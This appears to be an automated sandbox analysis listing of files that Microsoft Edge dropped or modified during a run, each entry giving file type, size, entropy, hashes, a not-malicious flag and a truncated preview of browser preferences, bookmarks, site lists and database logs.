              Preview:{"abusive_adblocker_etag":"\"9E0A5915E51EE1E95D843B1CDAB336B8361C98398784A73FC6A8A28F910D2E75\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:modified
              Size (bytes):70114
              Entropy (8bit):6.102590028713744
              Encrypted:false
              SSDEEP:
              MD5:46339D18D69AC2306E09440001001E81
              SHA1:0095A750EF73D2F633CA36A355CB6B647537452F
              SHA-256:B50C9B1C898B9442EF5B0AE1855B5C4305861335E46F531F13EE88580E4BF628
              SHA-512:A03E8DBEDC5A2316211FF128B557A075CE8939C30F672848E2E4BDEB4243106485CBEA0AD1571D82E797773EF589B5425D19E87D6377D681C113DD83A6F0719E
              Malicious:false
              Reputation:unknown
              Preview:{"abusive_adblocker_etag":"\"90A92C92CD02041775F8D7BC7E702833090B32800126F34DB0EC361D6A3705A1\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"0"},"domain_actions_config":"H4sIAAAAAAAAAL19a3PktrH2X1HpU5LyQNLe5M355HeziV3Jxi5nU656T6VUIIghIYIAF5eZ4bj83083ONJKOwRmmutzPngtUXxwY6Nv6G78evmdqa1z/N/f/biRzqlaXv7510s+DFoJHpQ1/vLP//2fby4HCw+UxN9+vTS8h9cu39eN/Pd3l99chnHA3wfuguL6ZzloLmQvTYC/bbiO+MfvoEn5i6z+rsLV65e37OWbiz/8/fuPH/7xzYVWnbz4mxSd/ePFu9bZXl7dXrNr9vL1y2/ZzfWLi3/xNXfqAYbdXt3AX25v37y8/O2bx/FM2KcjkvDqR9tJMz+mp+C/2H/a8LgGjy3Uzx4/eR9H8fbt/8rk376Fyb/69tUrdvvqeO7Tn29uXl+z16+Pp/9/Pqa5LwBE9U4r6O97ZYIvf4+jdw8D/PXSS7ES7SryFa/rRHiV4wZ+uvybtY2Wh7Fd/gb0+fldJ3u7Afx/X35Qwllv1yGRzCW8Fb10d7yBz
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):101588
              Entropy (8bit):4.633051351437205
              Encrypted:false
              SSDEEP:
              MD5:B6F6B940B2F40011221D658EF09689CA
              SHA1:700C315921CF72DFCF4E663232C29EE687C3BD0C
              SHA-256:40B5A55E8DC3B72C8DBF611DE737130FC18A144B7345A47D9220989887017D4E
              SHA-512:8AD4EEC72BE29953A9D97A0B41450A44784DCA05E39F5F6CD8BBCF616B67C143127CE864CD96D146F8C20A895C995EE141407FBF28247BE30EE735428997A9C0
              Malicious:false
              Reputation:unknown
              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:B6F6B940B2F40011221D658EF09689CA
              SHA1:700C315921CF72DFCF4E663232C29EE687C3BD0C
              SHA-256:40B5A55E8DC3B72C8DBF611DE737130FC18A144B7345A47D9220989887017D4E
              SHA-512:8AD4EEC72BE29953A9D97A0B41450A44784DCA05E39F5F6CD8BBCF616B67C143127CE864CD96D146F8C20A895C995EE141407FBF28247BE30EE735428997A9C0
              Malicious:false
              Reputation:unknown
              Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):4194304
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
              Malicious:false
              Reputation:unknown
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):4194304
              Entropy (8bit):0.5284740960402532
              Encrypted:false
              SSDEEP:
              MD5:1B2B15E93360CDDF6CBF033972E14610
              SHA1:8FE3F3219082F561CFA513C67B329D7C1FB65581
              SHA-256:8A234774B86AD0A1A2DF0CDB885D9884537E7FF7AEC16F1CA23B2ECA83586A81
              SHA-512:CC0573990DD0CA3A3C8F4D9498E7AE549533671A2600C5FF94B592F77B406A0503C129D0B3D4197D60EB47854560B94E500ECCF33A0A6999E7293C4C09B6C425
              Malicious:false
              Reputation:unknown
              Preview:...@..@...@.....C.].....@...................@...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ntrhen20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@.............."......................w..U?:K....&..`v.>.........."....."...24.."."JtyQ1A2NEIlw0A1806yiQy/yZBiHUYGocRJ4ref8zwc="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...f..a.. @..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):280
              Entropy (8bit):4.148816143243253
              Encrypted:false
              SSDEEP:
              MD5:615DE8EBA385564F4C7C695D15B15296
              SHA1:9881A42FECA4A67C63EDDDD191995C5D6F1347D9
              SHA-256:7ECF7405D8438F23D8373E87DAC39BA8963B2E8BEB94A6D57E526376ED7F54AE
              SHA-512:22AFBAD8CF3C20084584C8B207D66604994CF48C266761395DC474040E5C089D6FBD4AA852F75E3B89F1A300EE9BCB338FBF1D182CDB7831B7A90736AACC1258
              Malicious:false
              Reputation:unknown
              Preview:sdPC....................x.....RG..zl.!{'"JtyQ1A2NEIlw0A1806yiQy/yZBiHUYGocRJ4ref8zwc="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................2e0302ca-60d4-43ae-a7a2-15a4516f8209............
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):40356
              Entropy (8bit):5.562461786680237
              Encrypted:false
              SSDEEP:
              MD5:8A93A6B74694B0007A327991D37EFF42
              SHA1:49180DED6CA4CA93C19650C075219B68BA9CC4CE
              SHA-256:FB91185BEEA9BC31E58193B8D991E2E05903FD447524DF006CFE2D6AAD103170
              SHA-512:B9FE7E9981B9E935D4EBF8BEA17290FF034CAB7973CCF15AD215954207948A9E469DC48D82DE4DDE9BE0A15FBDD898917C2BDAD848DDB93BB3B9B4FB7C99DDCE
              Malicious:false
              Reputation:unknown
              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13353677849058639","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13353677849058639","location":5,"ma
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):703600
              Entropy (8bit):4.566128190989585
              Encrypted:false
              SSDEEP:
              MD5:850060681AA370F016982CADA22F52F8
              SHA1:87550F9370F6EC3EF99F8C434C540BECE6C3CF87
              SHA-256:64DDABCC23A910FBFC283BF70E9598A9DB5D633FAA8FC54D1DE84FDBCA85639D
              SHA-512:06C925AAD63AB4106E122B7B0336F4D2564FE60FD96E60264AA5316772EFE5BB935E084AF5DD83B17E8763F2C69FB2C22C4DB0E8B84B111B2BC6097FAFCC870C
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:modified
              Size (bytes):703596
              Entropy (8bit):4.566104147543723
              Encrypted:false
              SSDEEP:
              MD5:AE9A7A86817F4666230AD404CDC4FEB0
              SHA1:39B9759B8A9F29FED58BA0B3D5C701D5C47B6168
              SHA-256:28F53CBF72B33D3163A2DD74669200B1E6C04B17995501742148A097606C8515
              SHA-512:54775632D21711FF1B50118E75FF6E54F96981CED7BDFA9E1D829395C63DBD0B0CFB75AF929F51FDB5738A5E5E68731C9CD7C3ADF43F9A5F5373F7922472DB27
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):703140
              Entropy (8bit):4.565340329228589
              Encrypted:false
              SSDEEP:
              MD5:B8E6E4F0A6F09A49EF2800A1F3B4EFF2
              SHA1:609355878A85E9B8D21D3AD64E4C16A839E87237
              SHA-256:220608ED2371EB24C72073E1F93235AF21C484D6FE19715F990E0F1538FD89F8
              SHA-512:887C68A03D8851BEAE74F5214A4FA79064E2F39A436BC017EE16641F80731AC067FDBDE83759578C1DB6109025377C14B929FBD7E27DB9817D98D11E67F4BA42
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4364
              Entropy (8bit):4.2346758197573005
              Encrypted:false
              SSDEEP:
              MD5:2B9105C676625EC972AB4F9D02F5848E
              SHA1:3BA4D8FB3124BCBA5C1898435EF840D66A900F38
              SHA-256:E196F8F94D221F04D33ABC866C21A1F3E5EC000B838F242F56ECAAB550F064D8
              SHA-512:59F7FBF62014E67C4B31C968A25AE4BF81CD0336D65A87A61F6081D2FD1B62218D68904BFFB912F1ABDC9936EA9B6A909B87988F2B3AB067F3E3D8612F0A5620
              Malicious:false
              Reputation:unknown
              Preview:{.. "checksum": "45c5e75d52aad358849be76b67352156",.. "roots": {.. "bookmark_bar": {.. "children": [ {.. "date_added": "13351791129026434",.. "date_last_used": "0",.. "guid": "8207d328-b309-4144-8a36-f1c294fe64d3",.. "id": "7",.. "name": "Amazon",.. "show_icon": false,.. "source": "import_fre",.. "type": "url",.. "url": "http://www.amazon.com/".. }, {.. "date_added": "13351791129026434",.. "date_last_used": "0",.. "guid": "4d7e43f2-ec87-49de-8592-618e99fb24e0",.. "id": "8",.. "name": "Facebook",.. "show_icon": false,.. "source": "import_fre",.. "type": "url",.. "url": "http://www.facebook.com/".. }, {.. "date_added": "13351791129026434",.. "date_last_used": "0",.. "guid": "7510118f-0386-4819-b07e-d4da7bf2d503",.. "i
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):703602
              Entropy (8bit):4.566152459530983
              Encrypted:false
              SSDEEP:
              MD5:E606CC3A5023B5D251EB077E7DCEBFD8
              SHA1:B7E05635908BB0B784FAACF4D9D9FBFE4721B414
              SHA-256:5D2B07556D06D61558204784289F7663B21D873469696E8EA3946EA29FFAF364
              SHA-512:9EF217EE6EC4D199DAD3DB41687319AA702F6EFC3A358BA268A91429CD77AD4131851153693012915E66757A2AF30A57EDC8346C85545C0B94A35248A4BA0B03
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):38512
              Entropy (8bit):5.556113048291242
              Encrypted:false
              SSDEEP:
              MD5:C13C7A193D5296B6EBDD7CB5597B55CA
              SHA1:364636C6A462AC63B673000CA42B6FE97A468543
              SHA-256:A0F69086C1B5334A2C2F5F23CA3D1B6E01AB6781CAC89709361D20CA3207FDCC
              SHA-512:5754B0524F2274374496546132C81BC483A2E31F3616D0D4A2715B8E2BBB2387547FA7E84DB0FCF026E5C362A6590EFD4167FDC1AD99B6E193DD4CE4186CE8EF
              Malicious:false
              Reputation:unknown
              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13353677849058639","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13353677849058639","location":5,"ma
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):702547
              Entropy (8bit):4.561422819869765
              Encrypted:false
              SSDEEP:
              MD5:BEA0E03B5E999E5B2C5120A3649683D8
              SHA1:5BA808D37FA35184CD982493E21E1E63AF961F2A
              SHA-256:EB5541E865A33F45F5BA689645F5EEDB05A9F150AE87A69BD475E400C0C5E455
              SHA-512:784C381A28FB771D7CC78D288BD5E88EDC6FA15C3AD2E1DA651B1B6989E8423F6208EB84FC96346D0E305320B077471D5B7AA28654512EE73CFFEA6089DBC248
              Malicious:false
              Reputation:unknown
              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13353677849460366","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13341060137080976","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:dropped
              Size (bytes):33
              Entropy (8bit):3.5394429593752084
              Encrypted:false
              SSDEEP:
              MD5:F27314DD366903BBC6141EAE524B0FDE
              SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
              SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
              SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
              Malicious:false
              Reputation:unknown
              Preview:...m.................DB_VERSION.1
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):309
              Entropy (8bit):5.263672039815018
              Encrypted:false
              SSDEEP:
              MD5:B92F8B0948624A370D24747281D6AD48
              SHA1:72B7A079BD5EC4CE92E53D21248AAAECCCABB76D
              SHA-256:20F7F1D5F7027D042811A3C04CD11D521F8A19E79AA4CA415BDDB54FA34B4EFD
              SHA-512:BB9FC44FA6D738D80BF9371D6F897EE75082C441531ECEB0910747855F3C76EDBF56162D29B3BEDC5CC9B4871FBDE99D5984BE7CCB1541650BDACE4F14E59758
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:33.421 1984 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/02/29-11:57:33.433 1984 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:data
              Category:modified
              Size (bytes):1764984
              Entropy (8bit):5.13856524372633
              Encrypted:false
              SSDEEP:
              MD5:27DC4261EE0F58EFE704D0D8939E7245
              SHA1:2F4643991D13A7E53B383D4929F0D1688604D6B0
              SHA-256:29D6DE08939009E285F3CEB1A7AF0FB9443E7E154433BAC034123662A4F57080
              SHA-512:AD3E9631F6C71B0C54F89C8F74FEAA31B79B590AE353BDC9B2F4077552C917F83EC8A25D3C21CF6FB285452EB9E15789418A0F4F6F7C8D4134BDF6C68BF4FB9F
              Malicious:false
              Reputation:unknown
              Preview:...m.................DB_VERSION.1o.F..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13341059034905508.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):336
              Entropy (8bit):5.153259608888519
              Encrypted:false
              SSDEEP:
              MD5:CBC7AA3968A7E0592C6B7B9292186A7A
              SHA1:24CD9F52796CF334E10A6448D2A70E44B759EF6C
              SHA-256:A3BB4D685A98BCA47B1B39C6F74E87BDE01590A0B3EE06E1304884552CAAC5D7
              SHA-512:F2F4146A45B8FE38AA0FE63187DDA20542290F6D15C24CCD9AB287043B3F716307D71F70E625CC15993B86934CEA91C880940E0BAB4796AA8F0DEA90CE852FA6
              Malicious:false
              Reputation:unknown
              Preview:2024/02/29-11:57:32.889 1d54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/02/29-11:57:32.895 1d54 Recovering log #3.2024/02/29-11:57:32.927 1d54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:2B9105C676625EC972AB4F9D02F5848E
              SHA1:3BA4D8FB3124BCBA5C1898435EF840D66A900F38
              SHA-256:E196F8F94D221F04D33ABC866C21A1F3E5EC000B838F242F56ECAAB550F064D8
              SHA-512:59F7FBF62014E67C4B31C968A25AE4BF81CD0336D65A87A61F6081D2FD1B62218D68904BFFB912F1ABDC9936EA9B6A909B87988F2B3AB067F3E3D8612F0A5620
              Malicious:false
              Reputation:unknown
